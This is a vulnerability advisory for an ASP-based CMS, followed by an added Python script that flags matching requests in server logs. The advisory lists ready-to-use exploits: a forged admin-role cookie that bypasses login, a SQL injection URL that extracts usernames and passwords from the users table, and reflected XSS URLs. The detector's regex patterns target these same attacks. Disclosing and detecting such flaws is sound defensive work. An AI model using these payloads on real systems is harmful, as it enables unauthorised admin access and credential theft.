# Original Advisory: http://bugreport.ir/index.php?/40

1. Exploits:
	1.1. An attacker can access the admin pages by sending a manipulated cookie.
		-------------
		-Set these cookies: 
			RealmCmsUser=cUserfiles=userFiles&cIntallType=BugReportTeam&cDbLocat=in&cSiteName=www.Bugreport.IR&cFolder=%2Fcms&cUniqueID=db&cUserRole=1&cUserName=Admin&cUserID=20
		-Then go to:
			/_RealmAdmin/login.asp
		-------------
	1.2. SQL injection in the "KeyWordsList" function of "inc_routines.asp" through the "kwrd" parameter.
		-------------
		http://[URL]/cmsr/?job=kwl&kwrd=WWW.BugReport.IR' union select name,password from tblusers where name not like '%WWW.BugReport.IR
		-------------
	1.3. Reflected XSS and DB path disclosure in "/cms/_db/compact.asp".
		-------------
		http://[URL]/cms/_db/compact.asp?CmpctedDB=%3Cscript%3Ealert('XSSed by BugReport.IR')%3C/script%3E	(Reflected XSS attack)
		http://[URL]/cms/_db/compact.asp?CmpctedDB=1&Boyut=%3Cscript%3Ealert('XSSed by BugReport.IR')%3C/script%3E	(Reflected XSS attack)
		http://[URL]/cms/_db/compact.asp	(DB path disclosure)
		-------------
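
Added example (not part of the original advisory): a Python check that flags logged requests matching items 1.1 to 1.3 above, for reviewing web server logs of an affected installation. The function names, hit labels and sample requests are assumptions constructed for illustration, and it assumes the request URL and Cookie header are both recorded in the logs.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

SQLI = re.compile(r"'|\bunion\b.+\bselect\b", re.I | re.S)

def fully_decode(value, rounds=3):
    """Percent-decode again so double-encoded payloads are still seen."""
    for _ in range(rounds):
        value = unquote(value)
    return value

def cookie_subkeys(cookie_header, name="realmcmsuser"):
    """Split the keyed cookie (name=k1=v1&k2=v2) into its sub-keys."""
    for item in cookie_header.split(";"):
        key, _, value = item.strip().partition("=")
        if key.lower() == name:
            return {k.lower(): v[0] for k, v in parse_qs(value).items()}
    return {}

def classify(url, cookie_header=""):
    """Return the advisory items (1.1, 1.2, 1.3) that one request matches."""
    parts = urlsplit(url)
    path = parts.path.lower()
    params = {k.lower(): fully_decode(v[0])
              for k, v in parse_qs(parts.query, keep_blank_values=True).items()}
    hits = []
    # 1.1: client-supplied admin role; real admins may match, so correlate with logins.
    if "/_realmadmin/" in path and cookie_subkeys(cookie_header).get("cuserrole") == "1":
        hits.append("1.1 admin-role cookie")
    # 1.2: quote or UNION ... SELECT in the keyword search parameter.
    if SQLI.search(params.get("kwrd", "")):
        hits.append("1.2 sqli")
    # 1.3: markup in compact.asp parameters, or a bare request to the script.
    if path.endswith("/_db/compact.asp"):
        if any(c in params.get(p, "") for p in ("cmpcteddb", "boyut") for c in "<>"):
            hits.append("1.3 xss")
        elif "cmpcteddb" not in params:
            hits.append("1.3 path-disclosure")
    return hits

# Constructed sample requests (URL, Cookie header); not taken from real logs.
SAMPLES = [
    ("/cmsr/?job=kwl&kwrd=news", ""),
    ("/cmsr/?job=kwl&kwrd=a%27%20UNION%20SELECT%20x,y%20FROM%20t", ""),
    ("/cms/_db/compact.asp?CmpctedDB=1&Boyut=%253Cb%253E", ""),
    ("/_RealmAdmin/login.asp", "lang=en; RealmCmsUser=cUserRole=1&cUserName=Admin"),
]
for url, cookie in SAMPLES:
    print(url, "->", classify(url, cookie) or "clean")
```

A legitimate keyword that contains an apostrophe also matches the 1.2 rule, so hits are leads for review rather than confirmed attacks.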